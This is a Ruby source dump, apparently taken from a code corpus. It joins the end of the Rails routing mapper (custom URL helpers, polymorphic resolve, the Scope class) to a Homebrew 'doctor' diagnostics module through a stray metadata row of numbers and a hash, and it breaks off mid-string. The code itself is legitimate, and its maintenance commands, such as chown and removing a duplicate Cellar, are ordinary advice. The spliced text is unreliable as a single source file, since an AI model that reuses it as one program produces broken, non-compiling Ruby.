# Use the named concerns
#
# resources :posts do
# concerns :commentable
# end
#
# Concerns also work in any routes helper that you want to use:
#
# namespace :posts do
# concerns :commentable
# end
def concerns(*args)
options = args.extract_options!
args.flatten.each do |name|
if concern = @concerns[name]
concern.call(self, options)
else
raise ArgumentError, "No concern named #{name} was found!"
end
end
end
end
module CustomUrls
# Define custom URL helpers that will be added to the application's
# routes. This allows you to override and/or replace the default behavior
# of routing helpers, e.g:
#
# direct :homepage do
# "http://www.rubyonrails.org"
# end
#
# direct :commentable do |model|
# [ model, anchor: model.dom_id ]
# end
#
# direct :main do
# { controller: "pages", action: "index", subdomain: "www" }
# end
#
# The return value from the block passed to +direct+ must be a valid set of
# arguments for +url_for+ which will actually build the URL string. This can
# be one of the following:
#
# * A string, which is treated as a generated URL
# * A hash, e.g. <tt>{ controller: "pages", action: "index" }</tt>
# * An array, which is passed to +polymorphic_url+
# * An Active Model instance
# * An Active Model class
#
# NOTE: Other URL helpers can be called in the block but be careful not to invoke
# your custom URL helper again otherwise it will result in a stack overflow error.
#
# You can also specify default options that will be passed through to
# your URL helper definition, e.g:
#
# direct :browse, page: 1, size: 10 do |options|
# [ :products, options.merge(params.permit(:page, :size).to_h.symbolize_keys) ]
# end
#
# In this instance the +params+ object comes from the context in which the
# block is executed, e.g. generating a URL inside a controller action or a view.
# If the block is executed where there isn't a +params+ object such as this:
#
# Rails.application.routes.url_helpers.browse_path
#
# then it will raise a +NameError+. Because of this you need to be aware of the
# context in which you will use your custom URL helper when defining it.
#
# NOTE: The +direct+ method can't be used inside of a scope block such as
# +namespace+ or +scope+ and will raise an error if it detects that it is.
def direct(name, options = {}, &block)
unless @scope.root?
raise RuntimeError, "The direct method can't be used inside a routes scope block"
end
@set.add_url_helper(name, options, &block)
end
# Define custom polymorphic mappings of models to URLs. This alters the
# behavior of +polymorphic_url+ and consequently the behavior of
# +link_to+ and +form_for+ when passed a model instance, e.g:
#
# resource :basket
#
# resolve "Basket" do
# [:basket]
# end
#
# This will now generate "/basket" when a +Basket+ instance is passed to
# +link_to+ or +form_for+ instead of the standard "/baskets/:id".
#
# NOTE: This custom behavior only applies to simple polymorphic URLs where
# a single model instance is passed and not more complicated forms, e.g:
#
# # config/routes.rb
# resource :profile
# namespace :admin do
# resources :users
# end
#
# resolve("User") { [:profile] }
#
# # app/views/application/_menu.html.erb
# link_to "Profile", @current_user
# link_to "Profile", [:admin, @current_user]
#
# The first +link_to+ will generate "/profile" but the second will generate
# the standard polymorphic URL of "/admin/users/1".
#
# You can pass options to a polymorphic mapping - the arity for the block
# needs to be two as the instance is passed as the first argument, e.g:
#
# resolve "Basket", anchor: "items" do |basket, options|
# [:basket, options]
# end
#
# This generates the URL "/basket#items" because when the last item in an
# array passed to +polymorphic_url+ is a hash then it's treated as options
# to the URL helper that gets called.
#
# NOTE: The +resolve+ method can't be used inside of a scope block such as
# +namespace+ or +scope+ and will raise an error if it detects that it is.
def resolve(*args, &block)
unless @scope.root?
raise RuntimeError, "The resolve method can't be used inside a routes scope block"
end
options = args.extract_options!
args = args.flatten(1)
args.each do |klass|
@set.add_polymorphic_mapping(klass, options, &block)
end
end
end
class Scope # :nodoc:
OPTIONS = [:path, :shallow_path, :as, :shallow_prefix, :module,
:controller, :action, :path_names, :constraints,
:shallow, :blocks, :defaults, :via, :format, :options, :to]
RESOURCE_SCOPES = [:resource, :resources]
RESOURCE_METHOD_SCOPES = [:collection, :member, :new]
attr_reader :parent, :scope_level
def initialize(hash, parent = NULL, scope_level = nil)
@hash = hash
@parent = parent
@scope_level = scope_level
end
def nested?
scope_level == :nested
end
def null?
@hash.nil? && @parent.nil?
end
def root?
@parent.null?
end
def resources?
scope_level == :resources
end
def resource_method_scope?
RESOURCE_METHOD_SCOPES.include? scope_level
end
def action_name(name_prefix, prefix, collection_name, member_name)
case scope_level
when :nested
[name_prefix, prefix]
when :collection
[prefix, name_prefix, collection_name]
when :new
[prefix, :new, name_prefix, member_name]
when :member
[prefix, name_prefix, member_name]
when :root
[name_prefix, collection_name, prefix]
else
[name_prefix, member_name, prefix]
end
end
def resource_scope?
RESOURCE_SCOPES.include? scope_level
end
def options
OPTIONS
end
def new(hash)
self.class.new hash, self, scope_level
end
def new_level(level)
self.class.new(frame, self, level)
end
def [](key)
scope = find { |node| node.frame.key? key }
scope && scope.frame[key]
end
include Enumerable
def each
node = self
until node.equal? NULL
yield node
node = node.parent
end
end
def frame; @hash; end
NULL = Scope.new(nil, nil)
end
def initialize(set) #:nodoc:
@set = set
@scope = Scope.new(path_names: @set.resources_path_names)
@concerns = {}
end
include Base
include HttpHelpers
include Redirection
include Scoping
include Concerns
include Resources
include CustomUrls
end
end
end
| 34.419312 | 175 | 0.538283 |
ff7bf3e86362c5c07ca9a8d511ecf5b12bee9788 | 39,955 | require "keg"
require "language/python"
require "formula"
require "tempfile"
require "version"
require "development_tools"
require "utils/shell"
module Homebrew
module Diagnostic
def self.missing_deps(ff, hide = nil)
missing = {}
ff.each do |f|
missing_dependencies = f.missing_dependencies(hide: hide)
unless missing_dependencies.empty?
yield f.full_name, missing_dependencies if block_given?
missing[f.full_name] = missing_dependencies
end
end
missing
end
class Volumes
def initialize
@volumes = get_mounts
end
def which(path)
vols = get_mounts path
# no volume found
return -1 if vols.empty?
vol_index = @volumes.index(vols[0])
# volume not found in volume list
return -1 if vol_index.nil?
vol_index
end
def get_mounts(path = nil)
vols = []
# get the volume of path, if path is nil returns all volumes
args = %w[/bin/df -P]
args << path if path
Utils.popen_read(*args) do |io|
io.each_line do |line|
case line.chomp
# regex matches: /dev/disk0s2 489562928 440803616 48247312 91% /
when /^.+\s+[0-9]+\s+[0-9]+\s+[0-9]+\s+[0-9]{1,3}%\s+(.+)/
vols << $1
end
end
end
vols
end
end
class Checks
############# HELPERS
# Finds files in HOMEBREW_PREFIX *and* /usr/local.
# Specify paths relative to a prefix eg. "include/foo.h".
# Sets @found for your convenience.
def find_relative_paths(*relative_paths)
@found = [HOMEBREW_PREFIX, "/usr/local"].uniq.inject([]) do |found, prefix|
found + relative_paths.map { |f| File.join(prefix, f) }.select { |f| File.exist? f }
end
end
def inject_file_list(list, string)
list.inject(string) { |acc, elem| acc << " #{elem}\n" }
end
############# END HELPERS
def development_tools_checks
%w[
check_for_installed_developer_tools
].freeze
end
def fatal_development_tools_checks
%w[
].freeze
end
def build_error_checks
(development_tools_checks + %w[
]).freeze
end
def check_for_installed_developer_tools
return if DevelopmentTools.installed?
<<-EOS.undent
No developer tools installed.
#{DevelopmentTools.installation_instructions}
EOS
end
# See https://github.com/Homebrew/legacy-homebrew/pull/9986
def check_path_for_trailing_slashes
bad_paths = PATH.new(ENV["HOMEBREW_PATH"]).select { |p| p.end_with?("/") }
return if bad_paths.empty?
inject_file_list bad_paths, <<-EOS.undent
Some directories in your path end in a slash.
Directories in your path should not end in a slash. This can break other
doctor checks. The following directories should be edited:
EOS
end
# Anaconda installs multiple system & brew dupes, including OpenSSL, Python,
# sqlite, libpng, Qt, etc. Regularly breaks compile on Vim, MacVim and others.
# Is flagged as part of the *-config script checks below, but people seem
# to ignore those as warnings rather than extremely likely breakage.
def check_for_anaconda
return unless which("anaconda")
return unless which("python")
anaconda_directory = which("anaconda").realpath.dirname
python_binary = Utils.popen_read(which("python"), "-c", "import sys; sys.stdout.write(sys.executable)")
python_directory = Pathname.new(python_binary).realpath.dirname
# Only warn if Python lives with Anaconda, since is most problematic case.
return unless python_directory == anaconda_directory
<<-EOS.undent
Anaconda is known to frequently break Homebrew builds, including Vim and
MacVim, due to bundling many duplicates of system and Homebrew-available
tools.
If you encounter a build failure please temporarily remove Anaconda
from your $PATH and attempt the build again prior to reporting the
failure to us. Thanks!
EOS
end
def __check_stray_files(dir, pattern, white_list, message)
return unless File.directory?(dir)
files = Dir.chdir(dir) do
Dir[pattern].select { |f| File.file?(f) && !File.symlink?(f) } - Dir.glob(white_list)
end.map { |file| File.join(dir, file) }
return if files.empty?
inject_file_list(files, message)
end
def check_for_stray_dylibs
# Dylibs which are generally OK should be added to this list,
# with a short description of the software they come with.
white_list = [
"libfuse.2.dylib", # MacFuse
"libfuse_ino64.2.dylib", # MacFuse
"libmacfuse_i32.2.dylib", # OSXFuse MacFuse compatibility layer
"libmacfuse_i64.2.dylib", # OSXFuse MacFuse compatibility layer
"libosxfuse_i32.2.dylib", # OSXFuse
"libosxfuse_i64.2.dylib", # OSXFuse
"libosxfuse.2.dylib", # OSXFuse
"libTrAPI.dylib", # TrAPI/Endpoint Security VPN
"libntfs-3g.*.dylib", # NTFS-3G
"libntfs.*.dylib", # NTFS-3G
"libublio.*.dylib", # NTFS-3G
"libUFSDNTFS.dylib", # Paragon NTFS
"libUFSDExtFS.dylib", # Paragon ExtFS
"libecomlodr.dylib", # Symantec Endpoint Protection
"libsymsea.*.dylib", # Symantec Endpoint Protection
"sentinel.dylib", # SentinelOne
]
__check_stray_files "/usr/local/lib", "*.dylib", white_list, <<-EOS.undent
Unbrewed dylibs were found in /usr/local/lib.
If you didn't put them there on purpose they could cause problems when
building Homebrew formulae, and may need to be deleted.
Unexpected dylibs:
EOS
end
def check_for_stray_static_libs
# Static libs which are generally OK should be added to this list,
# with a short description of the software they come with.
white_list = [
"libsecurity_agent_client.a", # OS X 10.8.2 Supplemental Update
"libsecurity_agent_server.a", # OS X 10.8.2 Supplemental Update
"libntfs-3g.a", # NTFS-3G
"libntfs.a", # NTFS-3G
"libublio.a", # NTFS-3G
"libappfirewall.a", # Symantec Endpoint Protection
"libautoblock.a", # Symantec Endpoint Protection
"libautosetup.a", # Symantec Endpoint Protection
"libconnectionsclient.a", # Symantec Endpoint Protection
"liblocationawareness.a", # Symantec Endpoint Protection
"libpersonalfirewall.a", # Symantec Endpoint Protection
"libtrustedcomponents.a", # Symantec Endpoint Protection
]
__check_stray_files "/usr/local/lib", "*.a", white_list, <<-EOS.undent
Unbrewed static libraries were found in /usr/local/lib.
If you didn't put them there on purpose they could cause problems when
building Homebrew formulae, and may need to be deleted.
Unexpected static libraries:
EOS
end
def check_for_stray_pcs
# Package-config files which are generally OK should be added to this list,
# with a short description of the software they come with.
white_list = [
"fuse.pc", # OSXFuse/MacFuse
"macfuse.pc", # OSXFuse MacFuse compatibility layer
"osxfuse.pc", # OSXFuse
"libntfs-3g.pc", # NTFS-3G
"libublio.pc", # NTFS-3G
]
__check_stray_files "/usr/local/lib/pkgconfig", "*.pc", white_list, <<-EOS.undent
Unbrewed .pc files were found in /usr/local/lib/pkgconfig.
If you didn't put them there on purpose they could cause problems when
building Homebrew formulae, and may need to be deleted.
Unexpected .pc files:
EOS
end
def check_for_stray_las
white_list = [
"libfuse.la", # MacFuse
"libfuse_ino64.la", # MacFuse
"libosxfuse_i32.la", # OSXFuse
"libosxfuse_i64.la", # OSXFuse
"libosxfuse.la", # OSXFuse
"libntfs-3g.la", # NTFS-3G
"libntfs.la", # NTFS-3G
"libublio.la", # NTFS-3G
]
__check_stray_files "/usr/local/lib", "*.la", white_list, <<-EOS.undent
Unbrewed .la files were found in /usr/local/lib.
If you didn't put them there on purpose they could cause problems when
building Homebrew formulae, and may need to be deleted.
Unexpected .la files:
EOS
end
def check_for_stray_headers
white_list = [
"fuse.h", # MacFuse
"fuse/**/*.h", # MacFuse
"macfuse/**/*.h", # OSXFuse MacFuse compatibility layer
"osxfuse/**/*.h", # OSXFuse
"ntfs/**/*.h", # NTFS-3G
"ntfs-3g/**/*.h", # NTFS-3G
]
__check_stray_files "/usr/local/include", "**/*.h", white_list, <<-EOS.undent
Unbrewed header files were found in /usr/local/include.
If you didn't put them there on purpose they could cause problems when
building Homebrew formulae, and may need to be deleted.
Unexpected header files:
EOS
end
def check_for_broken_symlinks
broken_symlinks = []
Keg::PRUNEABLE_DIRECTORIES.each do |d|
next unless d.directory?
d.find do |path|
if path.symlink? && !path.resolved_path_exists?
broken_symlinks << path
end
end
end
return if broken_symlinks.empty?
inject_file_list broken_symlinks, <<-EOS.undent
Broken symlinks were found. Remove them with `brew prune`:
EOS
end
def check_tmpdir_sticky_bit
world_writable = HOMEBREW_TEMP.stat.mode & 0777 == 0777
return if !world_writable || HOMEBREW_TEMP.sticky?
<<-EOS.undent
#{HOMEBREW_TEMP} is world-writable but does not have the sticky bit set.
Please execute `sudo chmod +t #{HOMEBREW_TEMP}` in your Terminal.
Alternatively, if you don't have administrative privileges on this
machine, point the HOMEBREW_TEMP environment variable to a directory
you control, e.g. `mkdir ~/tmp; chmod 755 ~/tmp; export HOMEBREW_TEMP=~/tmp`.
EOS
end
def check_access_homebrew_repository
return if HOMEBREW_REPOSITORY.writable_real?
<<-EOS.undent
#{HOMEBREW_REPOSITORY} is not writable.
You should change the ownership and permissions of #{HOMEBREW_REPOSITORY}
back to your user account.
sudo chown -R $(whoami) #{HOMEBREW_REPOSITORY}
EOS
end
def check_access_prefix_directories
not_writable_dirs = []
Keg::ALL_TOP_LEVEL_DIRECTORIES.each do |dir|
path = HOMEBREW_PREFIX/dir
next unless path.exist?
next if path.writable_real?
not_writable_dirs << path
end
return if not_writable_dirs.empty?
<<-EOS.undent
The following directories are not writable:
#{not_writable_dirs.join("\n")}
This can happen if you "sudo make install" software that isn't managed
by Homebrew. If a formula tries to write a file to this directory, the
install will fail during the link step.
You should change the ownership and permissions of these directories.
back to your user account.
sudo chown -R $(whoami) #{not_writable_dirs.join(" ")}
EOS
end
def check_access_site_packages
return unless Language::Python.homebrew_site_packages.exist?
return if Language::Python.homebrew_site_packages.writable_real?
<<-EOS.undent
#{Language::Python.homebrew_site_packages} isn't writable.
This can happen if you "sudo pip install" software that isn't managed
by Homebrew. If you install a formula with Python modules, the install
will fail during the link step.
You should change the ownership and permissions of #{Language::Python.homebrew_site_packages}
back to your user account.
sudo chown -R $(whoami) #{Language::Python.homebrew_site_packages}
EOS
end
def check_access_lock_dir
return unless HOMEBREW_LOCK_DIR.exist?
return if HOMEBREW_LOCK_DIR.writable_real?
<<-EOS.undent
#{HOMEBREW_LOCK_DIR} isn't writable.
Homebrew writes lock files to this location.
You should change the ownership and permissions of #{HOMEBREW_LOCK_DIR}
back to your user account.
sudo chown -R $(whoami) #{HOMEBREW_LOCK_DIR}
EOS
end
def check_access_logs
return unless HOMEBREW_LOGS.exist?
return if HOMEBREW_LOGS.writable_real?
<<-EOS.undent
#{HOMEBREW_LOGS} isn't writable.
Homebrew writes debugging logs to this location.
You should change the ownership and permissions of #{HOMEBREW_LOGS}
back to your user account.
sudo chown -R $(whoami) #{HOMEBREW_LOGS}
EOS
end
def check_access_cache
return unless HOMEBREW_CACHE.exist?
return if HOMEBREW_CACHE.writable_real?
<<-EOS.undent
#{HOMEBREW_CACHE} isn't writable.
This can happen if you run `brew install` or `brew fetch` as another user.
Homebrew caches downloaded files to this location.
You should change the ownership and permissions of #{HOMEBREW_CACHE}
back to your user account.
sudo chown -R $(whoami) #{HOMEBREW_CACHE}
EOS
end
def check_access_cellar
return unless HOMEBREW_CELLAR.exist?
return if HOMEBREW_CELLAR.writable_real?
<<-EOS.undent
#{HOMEBREW_CELLAR} isn't writable.
You should change the ownership and permissions of #{HOMEBREW_CELLAR}
back to your user account.
sudo chown -R $(whoami) #{HOMEBREW_CELLAR}
EOS
end
def check_multiple_cellars
return if HOMEBREW_PREFIX.to_s == HOMEBREW_REPOSITORY.to_s
return unless (HOMEBREW_REPOSITORY/"Cellar").exist?
return unless (HOMEBREW_PREFIX/"Cellar").exist?
<<-EOS.undent
You have multiple Cellars.
You should delete #{HOMEBREW_REPOSITORY}/Cellar:
rm -rf #{HOMEBREW_REPOSITORY}/Cellar
EOS
end
def check_user_path_1
$seen_prefix_bin = false
$seen_prefix_sbin = false
message = ""
paths(ENV["HOMEBREW_PATH"]).each do |p|
case p
when "/usr/bin"
unless $seen_prefix_bin
# only show the doctor message if there are any conflicts
# rationale: a default install should not trigger any brew doctor messages
conflicts = Dir["#{HOMEBREW_PREFIX}/bin/*"]
.map { |fn| File.basename fn }
.select { |bn| File.exist? "/usr/bin/#{bn}" }
unless conflicts.empty?
message = inject_file_list conflicts, <<-EOS.undent
/usr/bin occurs before #{HOMEBREW_PREFIX}/bin
This means that system-provided programs will be used instead of those
provided by Homebrew. The following tools exist at both paths:
EOS
message += <<-EOS.undent
Consider setting your PATH so that #{HOMEBREW_PREFIX}/bin
occurs before /usr/bin. Here is a one-liner:
#{Utils::Shell.prepend_path_in_profile("#{HOMEBREW_PREFIX}/bin")}
EOS
end
end
when "#{HOMEBREW_PREFIX}/bin"
$seen_prefix_bin = true
when "#{HOMEBREW_PREFIX}/sbin"
$seen_prefix_sbin = true
end
end
message unless message.empty?
end
def check_user_path_2
return if $seen_prefix_bin
<<-EOS.undent
Homebrew's bin was not found in your PATH.
Consider setting the PATH for example like so
#{Utils::Shell.prepend_path_in_profile("#{HOMEBREW_PREFIX}/bin")}
EOS
end
def check_user_path_3
return if $seen_prefix_sbin
# Don't complain about sbin not being in the path if it doesn't exist
sbin = HOMEBREW_PREFIX/"sbin"
return unless sbin.directory? && !sbin.children.empty?
<<-EOS.undent
Homebrew's sbin was not found in your PATH but you have installed
formulae that put executables in #{HOMEBREW_PREFIX}/sbin.
Consider setting the PATH for example like so
#{Utils::Shell.prepend_path_in_profile("#{HOMEBREW_PREFIX}/sbin")}
EOS
end
def check_xdg_data_dirs
share = "#{HOMEBREW_PREFIX}/share"
homebrew_in_xdg_data_dirs =
!ENV["XDG_DATA_DIRS"] || ENV["XDG_DATA_DIRS"] == "" ||
ENV["XDG_DATA_DIRS"].split(File::PATH_SEPARATOR).include?(share)
return if homebrew_in_xdg_data_dirs
<<-EOS.undent
Homebrew's share was not found in your XDG_DATA_DIRS but you have
this variable set to include other locations.
Some programs like `vapigen` may not work correctly.
Consider setting the XDG_DATA_DIRS for example like so
echo 'export XDG_DATA_DIRS="#{share}:$XDG_DATA_DIRS"' >> #{Utils::Shell.shell_profile}
EOS
end
def check_user_curlrc
curlrc_found = %w[CURL_HOME HOME].any? do |var|
ENV[var] && File.exist?("#{ENV[var]}/.curlrc")
end
return unless curlrc_found
<<-EOS.undent
You have a curlrc file
If you have trouble downloading packages with Homebrew, then maybe this
is the problem? If the following command doesn't work, then try removing
your curlrc:
curl #{Formatter.url("https://github.com")}
EOS
end
def check_for_gettext
return unless OS.mac?
find_relative_paths("lib/libgettextlib.dylib",
"lib/libintl.dylib",
"include/libintl.h")
return if @found.empty?
# Our gettext formula will be caught by check_linked_keg_only_brews
gettext = begin
Formulary.factory("gettext")
rescue
nil
end
homebrew_owned = @found.all? do |path|
Pathname.new(path).realpath.to_s.start_with? "#{HOMEBREW_CELLAR}/gettext"
end
return if gettext && gettext.linked_keg.directory? && homebrew_owned
inject_file_list @found, <<-EOS.undent
gettext files detected at a system prefix.
These files can cause compilation and link failures, especially if they
are compiled with improper architectures. Consider removing these files:
EOS
end
def check_for_iconv
return unless OS.mac?
find_relative_paths("lib/libiconv.dylib", "include/iconv.h")
return if @found.empty?
libiconv = begin
Formulary.factory("libiconv")
rescue
nil
end
if libiconv && libiconv.linked_keg.directory?
unless libiconv.keg_only?
<<-EOS.undent
A libiconv formula is installed and linked.
This will break stuff. For serious. Unlink it.
EOS
end
else
inject_file_list @found, <<-EOS.undent
libiconv files detected at a system prefix other than /usr.
Homebrew doesn't provide a libiconv formula, and expects to link against
the system version in /usr. libiconv in other prefixes can cause
compile or link failure, especially if compiled with improper
architectures. macOS itself never installs anything to /usr/local so
it was either installed by a user or some other third party software.
tl;dr: delete these files:
EOS
end
end
def check_for_config_scripts
return unless HOMEBREW_CELLAR.exist?
real_cellar = HOMEBREW_CELLAR.realpath
scripts = []
whitelist = %W[
/usr/bin /usr/sbin
/usr/X11/bin /usr/X11R6/bin /opt/X11/bin
#{HOMEBREW_PREFIX}/bin #{HOMEBREW_PREFIX}/sbin
/Applications/Server.app/Contents/ServerRoot/usr/bin
/Applications/Server.app/Contents/ServerRoot/usr/sbin
].map(&:downcase)
paths(ENV["HOMEBREW_PATH"]).each do |p|
next if whitelist.include?(p.downcase) || !File.directory?(p)
realpath = Pathname.new(p).realpath.to_s
next if realpath.start_with?(real_cellar.to_s, HOMEBREW_CELLAR.to_s)
scripts += Dir.chdir(p) { Dir["*-config"] }.map { |c| File.join(p, c) }
end
return if scripts.empty?
inject_file_list scripts, <<-EOS.undent
"config" scripts exist outside your system or Homebrew directories.
`./configure` scripts often look for *-config scripts to determine if
software packages are installed, and what additional flags to use when
compiling and linking.
Having additional scripts in your path can confuse software installed via
Homebrew if the config script overrides a system or Homebrew provided
script of the same name. We found the following "config" scripts:
EOS
end
def check_dyld_vars
dyld = OS.mac? ? "DYLD" : "LD"
dyld_vars = ENV.keys.grep(/^#{dyld}_/)
return if dyld_vars.empty?
values = dyld_vars.map { |var| "#{var}: #{ENV.fetch(var)}" }
message = inject_file_list values, <<-EOS.undent
Setting #{dyld}_* vars can break dynamic linking.
Set variables:
EOS
if dyld_vars.include? "DYLD_INSERT_LIBRARIES"
message += <<-EOS.undent
Setting DYLD_INSERT_LIBRARIES can cause Go builds to fail.
Having this set is common if you use this software:
#{Formatter.url("https://asepsis.binaryage.com/")}
EOS
end
message
end
def check_ssl_cert_file
return unless ENV.key?("SSL_CERT_FILE")
<<-EOS.undent
Setting SSL_CERT_FILE can break downloading files; if that happens
you should unset it before running Homebrew.
Homebrew uses the system curl which uses system certificates by
default. Setting SSL_CERT_FILE makes it use an outdated OpenSSL, which
does not support modern OpenSSL certificate stores.
EOS
end
def check_for_symlinked_cellar
return unless HOMEBREW_CELLAR.exist?
return unless HOMEBREW_CELLAR.symlink?
<<-EOS.undent
Symlinked Cellars can cause problems.
Your Homebrew Cellar is a symlink: #{HOMEBREW_CELLAR}
which resolves to: #{HOMEBREW_CELLAR.realpath}
The recommended Homebrew installations are either:
(A) Have Cellar be a real directory inside of your HOMEBREW_PREFIX
(B) Symlink "bin/brew" into your prefix, but don't symlink "Cellar".
Older installations of Homebrew may have created a symlinked Cellar, but this can
cause problems when two formula install to locations that are mapped on top of each
other during the linking step.
EOS
end
def check_for_multiple_volumes
return unless OS.mac?
return unless HOMEBREW_CELLAR.exist?
volumes = Volumes.new
# Find the volumes for the TMP folder & HOMEBREW_CELLAR
real_cellar = HOMEBREW_CELLAR.realpath
where_cellar = volumes.which real_cellar
begin
tmp = Pathname.new(Dir.mktmpdir("doctor", HOMEBREW_TEMP))
begin
real_tmp = tmp.realpath.parent
where_tmp = volumes.which real_tmp
ensure
Dir.delete tmp
end
rescue
return
end
return if where_cellar == where_tmp
<<-EOS.undent
Your Cellar and TEMP directories are on different volumes.
macOS won't move relative symlinks across volumes unless the target file already
exists. Brews known to be affected by this are Git and Narwhal.
You should set the "HOMEBREW_TEMP" environmental variable to a suitable
directory on the same volume as your Cellar.
EOS
end
def check_git_version
# https://help.github.com/articles/https-cloning-errors
return unless Utils.git_available?
return unless Version.create(Utils.git_version) < Version.create("1.8.5")
git = Formula["git"]
git_upgrade_cmd = git.any_version_installed? ? "upgrade" : "install"
<<-EOS.undent
An outdated version (#{Utils.git_version}) of Git was detected in your PATH.
Git 1.8.5 or newer is required to perform checkouts over HTTPS from GitHub and
to support the 'git -C <path>' option.
Please upgrade:
brew #{git_upgrade_cmd} git
EOS
end
def check_for_git
return if Utils.git_available?
<<-EOS.undent
Git could not be found in your PATH.
Homebrew uses Git for several internal functions, and some formulae use Git
checkouts instead of stable tarballs. You may want to install Git:
brew install git
EOS
end
def check_git_newline_settings
return unless Utils.git_available?
autocrlf = HOMEBREW_REPOSITORY.cd { `git config --get core.autocrlf`.chomp }
return unless autocrlf == "true"
<<-EOS.undent
Suspicious Git newline settings found.
The detected Git newline settings will cause checkout problems:
core.autocrlf = #{autocrlf}
If you are not routinely dealing with Windows-based projects,
consider removing these by running:
git config --global core.autocrlf input
EOS
end
def check_brew_git_origin
return if !Utils.git_available? || !(HOMEBREW_REPOSITORY/".git").exist?
origin = HOMEBREW_REPOSITORY.git_origin
remote = "https://github.com/#{OS::GITHUB_USER}/brew.git"
if origin.nil?
<<-EOS.undent
Missing Homebrew/brew git origin remote.
Without a correctly configured origin, Homebrew won't update
properly. You can solve this by adding the Homebrew remote:
git -C "#{HOMEBREW_REPOSITORY}" remote add origin #{Formatter.url(remote)}
EOS
elsif origin !~ %r{(Homebrew|Linuxbrew)/brew(\.git)?$}
<<-EOS.undent
Suspicious Homebrew/brew git origin remote found.
With a non-standard origin, Homebrew won't pull updates from
the main repository. The current git origin is:
#{origin}
Unless you have compelling reasons, consider setting the
origin remote to point at the main repository by running:
git -C "#{HOMEBREW_REPOSITORY}" remote add origin #{Formatter.url(remote)}
EOS
end
end
def check_coretap_git_origin
coretap_path = CoreTap.instance.path
return if !Utils.git_available? || !(coretap_path/".git").exist?
origin = coretap_path.git_origin
remote = "https://github.com/#{OS::GITHUB_USER}/homebrew-core.git"
if origin.nil?
<<-EOS.undent
Missing #{CoreTap.instance} git origin remote.
Without a correctly configured origin, Homebrew won't update
properly. You can solve this by adding the Homebrew remote:
git -C "#{coretap_path}" remote add origin #{Formatter.url(remote)}
EOS
elsif origin !~ %r{(Homebrew|Linuxbrew)/homebrew-core(\.git|/)?$}
<<-EOS.undent
Suspicious #{CoreTap.instance} git origin remote found.
With a non-standard origin, Homebrew won't pull updates from
the main repository. The current git origin is:
#{origin}
Unless you have compelling reasons, consider setting the
origin remote to point at the main repository by running:
git -C "#{coretap_path}" remote add origin #{Formatter.url(remote)}
EOS
end
end
def __check_linked_brew(f)
f.installed_prefixes.each do |prefix|
prefix.find do |src|
next if src == prefix
dst = HOMEBREW_PREFIX + src.relative_path_from(prefix)
return true if dst.symlink? && src == dst.resolved_path
end
end
false
end
def check_for_linked_keg_only_brews
return unless HOMEBREW_CELLAR.exist?
linked = Formula.installed.select do |f|
f.keg_only? && __check_linked_brew(f)
end
return if linked.empty?
inject_file_list linked.map(&:full_name), <<-EOS.undent
Some keg-only formula are linked into the Cellar.
Linking a keg-only formula, such as gettext, into the cellar with
`brew link <formula>` will cause other formulae to detect them during
the `./configure` step. This may cause problems when compiling those
other formulae.
Binaries provided by keg-only formulae may override system binaries
with other strange results.
You may wish to `brew unlink` these brews:
EOS
end
def check_for_other_frameworks
# Other frameworks that are known to cause problems when present
frameworks_to_check = %w[
expat.framework
libexpat.framework
libcurl.framework
]
frameworks_found = frameworks_to_check
.map { |framework| "/Library/Frameworks/#{framework}" }
.select { |framework| File.exist? framework }
return if frameworks_found.empty?
inject_file_list frameworks_found, <<-EOS.undent
Some frameworks can be picked up by CMake's build system and likely
cause the build to fail. To compile CMake, you may wish to move these
out of the way:
EOS
end
def check_tmpdir
tmpdir = ENV["TMPDIR"]
return if tmpdir.nil? || File.directory?(tmpdir)
<<-EOS.undent
TMPDIR #{tmpdir.inspect} doesn't exist.
EOS
end
def check_tmpdir_executable
Tempfile.open("homebrew_check_tmpdir_executable", HOMEBREW_TEMP) do |f|
f.write "#!/bin/sh\n"
f.chmod 0700
f.close
unless system f.path
<<-EOS.undent
The directory #{HOMEBREW_TEMP} does not permit executing
programs. It is likely mounted "noexec". Please set HOMEBREW_TEMP
in your #{shell_profile} to a different directory.
export HOMEBREW_TEMP=~/tmp
echo 'export HOMEBREW_TEMP=~/tmp' >> #{shell_profile}
EOS
end
end
end
def check_missing_deps
return unless HOMEBREW_CELLAR.exist?
missing = Set.new
Homebrew::Diagnostic.missing_deps(Formula.installed).each_value do |deps|
missing.merge(deps)
end
return if missing.empty?
<<-EOS.undent
Some installed formula are missing dependencies.
You should `brew install` the missing dependencies:
brew install #{missing.sort_by(&:full_name) * " "}
Run `brew missing` for more details.
EOS
end
def check_git_status
return unless Utils.git_available?
HOMEBREW_REPOSITORY.cd do
return if `git status --untracked-files=all --porcelain -- Library/Homebrew/ 2>/dev/null`.chomp.empty?
end
<<-EOS.undent
You have uncommitted modifications to Homebrew
If this is a surprise to you, then you should stash these modifications.
Stashing returns Homebrew to a pristine state but can be undone
should you later need to do so for some reason.
cd #{HOMEBREW_LIBRARY} && git stash && git clean -d -f
EOS
end
def check_for_enthought_python
return unless which "enpkg"
<<-EOS.undent
Enthought Python was found in your PATH.
This can cause build problems, as this software installs its own
copies of iconv and libxml2 into directories that are picked up by
other build systems.
EOS
end
def check_for_library_python
return unless File.exist?("/Library/Frameworks/Python.framework")
<<-EOS.undent
Python is installed at /Library/Frameworks/Python.framework
Homebrew only supports building against the System-provided Python or a
brewed Python. In particular, Pythons installed to /Library can interfere
with other software installs.
EOS
end
def check_for_old_homebrew_share_python_in_path
message = ""
["", "3"].map do |suffix|
next unless paths.include?((HOMEBREW_PREFIX/"share/python#{suffix}").to_s)
message += <<-EOS.undent
#{HOMEBREW_PREFIX}/share/python#{suffix} is not needed in PATH.
EOS
end
unless message.empty?
message += <<-EOS.undent
Formerly homebrew put Python scripts you installed via `pip` or `pip3`
(or `easy_install`) into that directory above but now it can be removed
from your PATH variable.
Python scripts will now install into #{HOMEBREW_PREFIX}/bin.
You can delete anything, except 'Extras', from the #{HOMEBREW_PREFIX}/share/python
(and #{HOMEBREW_PREFIX}/share/python3) dir and install affected Python packages
anew with `pip install --upgrade`.
EOS
end
message unless message.empty?
end
def check_for_bad_python_symlink
return unless which "python"
`python -V 2>&1` =~ /Python (\d+)\./
# This won't be the right warning if we matched nothing at all
return if $1.nil?
return if $1 == "2"
<<-EOS.undent
python is symlinked to python#{$1}
This will confuse build scripts and in general lead to subtle breakage.
EOS
end
def check_for_non_prefixed_coreutils
coreutils = Formula["coreutils"]
return unless coreutils.any_version_installed?
gnubin = %W[#{coreutils.opt_libexec}/gnubin #{coreutils.libexec}/gnubin]
return if (paths & gnubin).empty?
<<-EOS.undent
